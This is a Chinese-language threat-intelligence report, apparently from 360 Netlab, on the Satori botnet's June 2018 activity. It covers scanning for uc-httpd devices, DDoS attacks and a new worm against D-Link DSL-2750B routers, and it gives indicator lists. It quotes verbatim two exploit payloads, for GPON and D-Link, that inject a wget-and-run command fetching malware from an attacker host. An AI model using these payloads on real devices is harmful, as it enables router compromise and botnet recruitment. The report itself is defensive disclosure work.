2018-06-14,我們注意到 Satori 的作者開始掃描收集 uc-httpd 1.0.0 設備的IP地址列表。這或許是為了針對4月公開的脆弱性 XiongMai uc-httpd 1.0.0 (CVE-2018-10088) 在做準備。這些掃描活動導致了近期在 80 和 8000 端口上的掃描流量大漲。
3小時前,就在我們撰寫本篇文章的同時,Satori 作者又發佈了一個更新版本。這個更新是個蠕蟲,針對 D-Link DSL-2750B 設備,對應的漏洞利用在5月25日剛剛公開 。
殭屍永遠不死
Satori 是 Mirai 殭屍網絡的一個變種,我們首次注意到該殭屍網絡是 2017-11-22。一週之後,2017-12-05,Satori在12小時內感染了超過26萬家用路由器設備,成為臭名昭著的殭屍網絡。從那以後我們不再使用“一個mirai殭屍網絡變種”稱呼它,而是給予了它一個獨立的名字 Satori。以上這些記錄在我們之前的報告 中。
在那之後,安全社區採取了聯合行動。多家運營商在 Satori 的重點攻擊端口 37215 上採取了對抗措施。從事後看,這些措施有效抑制了 Satori 的擴張速度。但僅僅安全社區的這些披露和聯合行動似乎並不能阻止 Satori 作者的更新。
2018-01-08,我們檢測到 Satori 的後繼變種Satori.Coin.Robber 嘗試在端口37215和52869上重新建立整個殭屍網絡。值得注意的是,新變種開始滲透互聯網上現存Claymore Miner挖礦設備,通過攻擊其3333 管理端口,替換錢包地址,並最終攫取受害挖礦設備的算力和對應的 ETH 代幣。這是我們第一次見到殭屍網絡替換其他挖礦設備的錢包。我們在另一份報告中批露了 Satori 的這些活動。
2018-05-10,GPON 漏洞(CVE-2018-10561,CVE-2018-10562)公佈以後不到 10 天,Satori 也加入搶奪 GPON 易感設備的行列。並且Satori在短短時間內就擠掉了其他競爭對手,成為 “GPON殭屍Party” 中投放能力最強的一個。這已經是我們關於Satori 的第四份報告 。
現在這篇是我們關於Satori 的第五份報告。殭屍永遠不死,而且它們拒絕凋零。Satori的作者選擇留在了場上。
Satori 過去幾天裡的活動更新
Satori 近期活動的核心樣本如下:
hxxp://185.62.190.191/arm.bot.le
該樣本是由其它感染設備投入的,利用的漏洞是 GPON( CVE-2018-10561),投入時的攻擊Payload 是:
POST /GponForm/diag_Form?images/ HTTP/1.1 Host: 127.0.0.1:8080 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Hello, World Content-Length: 118XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+hxxp://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
在該樣本中:
- 信息收集和上報:掃描互聯網,尋找擁有 “uc-httpd 1.0.0” 設備指紋的IP地址,並將收集到的IP地址彙報至 r[.]rippr.cc:48101;
- 控制主機:95.215.62.169:5600 是其上聯主機。C2通信協議也與之前版本不同,但本文不做展開;
- DDoS攻擊能力:集成四種 DDoS 攻擊向量 udp_flood,syn_flood,tcp_ack_flood,gre_flood;
在我們觀察的過程中,該分支已經至少發起過兩次DDoS攻擊,攻擊細節如下:
- 2018-06-13 21:09:00 前後:TCP_ACK_FLOOD->(144.217.47.56:25565)
- 2018-06-14 23:00:00 前後:UDP_FLOOD -> (185.71.67.43:53)
這兩次攻擊分別與我們DDoSMon 上的 觀察1 和 觀察2 一致。
該樣本導致了近期 80和8000 端口上的掃描流量
我們近期在ScanMon上分別觀察到 80 和 8000 端口上的掃描流量增長。兩次流量增長的開始時間分別是 2018-06-09 和 2018-06-14。
這兩個端口上的流量增長,均是 Satori 樣本 arm.bot.le 及其更新版本導致的:
- 端口80:掃描流量中的首包為 GET / HTTP/1.0,這與我們在 arm.bot.le 樣本中觀察到的 payload 一致;
- 端口8000:掃描流量中的首包為 HEAD / HTTP/1.0,這與我們在 arm.bot.le 的更新版本中觀察到的payload一致。
同源性分析
我們判定當前這些惡意樣本與之前的 Satori 是同源的:
- 地址同源:樣本下載URL(hxxp://185.62.190.191/arm.bot.le) 中的IP地址 185.62.190.191 ,是新樣本的Downloader,這個IP地址也是 Satori 在之前 GPON 漏洞Party 中使用的Downloader 地址。
- 代碼同源:一段借鑑於 MIRAI 的解密代碼在之前 Satori 的 okiru 系列樣本中使用過。這段代碼在新樣本也在延續使用。
上面兩圖展示的加密代碼片段分別來自:
- 本輪的 Satori 樣本:F8D1D92E9B74445F2A0D7F1FEB78D639,
- 之前的 Satori Okiru 分支 : 0D39BF8EE7AC89DEC5DD8E541A828E15,
Satori 在採集 uc-httpd 1.0.0 設備指紋的 IP 地址
Satori 正在通過掃描 80/8000 端口的方式採集擁有“uc-httpd 1.0.0”設備指紋的 IP 地址,相關偽代碼見後。
一旦發現匹配的目標,便會將其 IP 彙報至 180.101.204.161:48101。值得說明的是上述地址是動態配置在 r.rippr.cc 域名的 DNS TXT 記錄中的。通過這種方式作者可以在服務器端隨意修改 C2 的IP地址,避免了樣本硬編碼。
Satori 當前的更新
- 針對漏洞:D-Link DSL-2750B 的命令執行漏洞
- 漏洞利用:在5月25日剛剛 公開
- 掃描端口:80 和 8080
- 蠕蟲式傳播:該漏洞利用同時出現在攻擊投入的Payload中,以及投入成功後得到的樣本中。如此,樣本能夠傳播自身,形成蠕蟲式傳播
- C2:95.215.62[.]169:5600。該IP地址動態配置在 i.rippr.cc 域名的 DNS TXT 中。
樣本來自:
- e0278453d814d64365ce22a0c543ecb6 hxxp://185.62.190.191/r
- b288d2f404963fbc7ab03fcb51885cc3 hxxp://185.62.190.191/mipsel.bot.le
- 78191f8f942b8c9b3b6cceb743cefb03 hxxp://185.62.190.191/arm7.bot.le
- 753cbfec2475be870003a47b00e8e372 hxxp://185.62.190.191/arm.bot.le
- 0a44d64fdf9aebfedf433fb679b8b289 hxxp://185.62.190.191/mips.bot.be
樣本的投入 Payload :
GET /login.cgi?cli=aa aa';wget hxxp://185.62.190.191/r -O -> /tmp/r;sh /tmp/r'$ HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Hello, World
該攻擊 Payload 同時出現在樣本中:
IoC
185.62.190.191 Satori Downloader 180.101.204.161:48101 Satori Report r.rippr.cc Satori Reporter listed in this host's DNS TXT record 95.215.62.169:5600 Satori C2 i.rippr.cc Satori C2 listed in this host's DNS TXT record
Satori Malware Sample md5
f6568772b36064f3bb58ac3aec09d30e http://123.207.251.95:80/bins/arm f6568772b36064f3bb58ac3aec09d30e http://123.207.251.95:80/bins/arm7 f6568772b36064f3bb58ac3aec09d30e http://185.62.190.191/arm.bot.le 99f13d801c40f23b19a07c6c77402095 http://123.207.251.95:80/bins/mpsl 99f13d801c40f23b19a07c6c77402095 http://185.62.190.191/mipsel.bot.le e337d9c99bfe2feef8949f6563c57062 http://123.207.251.95:80/bins/arm7 e337d9c99bfe2feef8949f6563c57062 http://185.62.190.191/arm7.bot.le f8d1d92e9b74445f2a0d7f1feb78d639 http://123.207.251.95:80/bins/arm f8d1d92e9b74445f2a0d7f1feb78d639 http://185.62.190.191/arm.bot.le 656f4a61cf29f3af54affde4fccb5fd0 http://185.62.190.191/x86_64.bot.le 31a40e95b605a93f702e4aa0092380b9 http://185.62.190.191/i686.bot.le 426f8281d6599c9489057af1678ce468 http://185.62.190.191/arm7.bot.le 44133462bd9653da097220157b1c0c61 http://185.62.190.191/arm.bot.le 476cd802889049e3d492b8fb7c5d09ed http://185.62.190.191/mipsel.bot.le bdf1a0ec31f130e959adafffb6014cce http://185.62.190.191/x86_64.bot.le e193a58b317a7b44622efe57508eecc4 http://185.62.190.191/r
(轉自:安全客 更多資訊盡在www.360.cn)
閱讀更多 360安全衛士 的文章
